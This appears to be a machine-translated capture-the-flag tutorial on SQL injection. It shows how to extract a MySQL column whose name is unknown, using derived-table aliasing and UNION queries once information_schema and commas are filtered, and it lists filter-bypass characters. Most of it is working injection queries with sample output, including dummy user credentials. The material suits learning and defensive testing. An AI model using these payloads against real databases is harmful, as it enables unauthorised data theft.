How Mysql cleverly bypasses unknown field names
Implementation
Question Filtering: space and comma. % 0a, % 0b, % 0c, % 0d, % a0, or parentheses can be used directly. commas can be used to bypass join; how Mysql cleverly bypasses unknown field names
The field name for storing the flag is unknown. information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained. In this case, you can use the joint query procedure as follows:
The idea is to obtain the flag so that it appears under a known field name;
Sample Code:
Mysql> select (select 1) a, (select 2) B, (select 3) c, (select 4) d;
+ --- +
| A | B | c | d |
+ --- +
| 1 | 2 | 3 | 4 |
+ --- +
1 row in set (0.00 sec)
Mysql> select * from (select 1) a, (select 2) B, (select 3) c, (select 4) d;
+ --- +
| 1 | 2 | 3 | 4 |
+ --- +
| 1 | 2 | 3 | 4 |
+ --- +
1 row in set (0.00 sec)
Mysql> select * from (select 1) a, (select 2) B, (select 3) c, (select 4) d union select * from user;
+ --- + ------- + ---------- + ------------- +
| 1 | 2 | 3 | 4 |
+ --- + ------- + ---------- + ------------- +
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+ --- + ------- + ---------- + ------------- +
4 rows in set (0.01 sec)
Mysql> select e.4 from (select * from (select 1) a, (select 2) B, (select 3) c, (select 4) d union select * from user) e;
+ ------------- +
| 4 |
+ ------------- +
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+ ------------- +
4 rows in set (0.03 sec)
Mysql> select e.4 from (select * from (select 1) a, (select 2) B, (select 3) c, (select 4) d union select * from user) e limit 1 offset 3;
+ ------------- +
| 4 |
+ ------------- +
| 120@120.com |
+ ------------- +
1 row in set (0.01 sec)
Mysql> select * from user where id = 1 union select (select e.4 from (select * from (select 1) a, (select 2) B, (select 3) c, (select 4) d
Union select * from user) e limit 1 offset 3) f, (select 1) g, (select 1) h, (select 1) I;
+ ------------- + ---------- + ------------- +
| Id | username | password | email |
+ ------------- + ---------- + ------------- +
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+ ------------- + ---------- + ------------- +
2 rows in set (0.04 sec)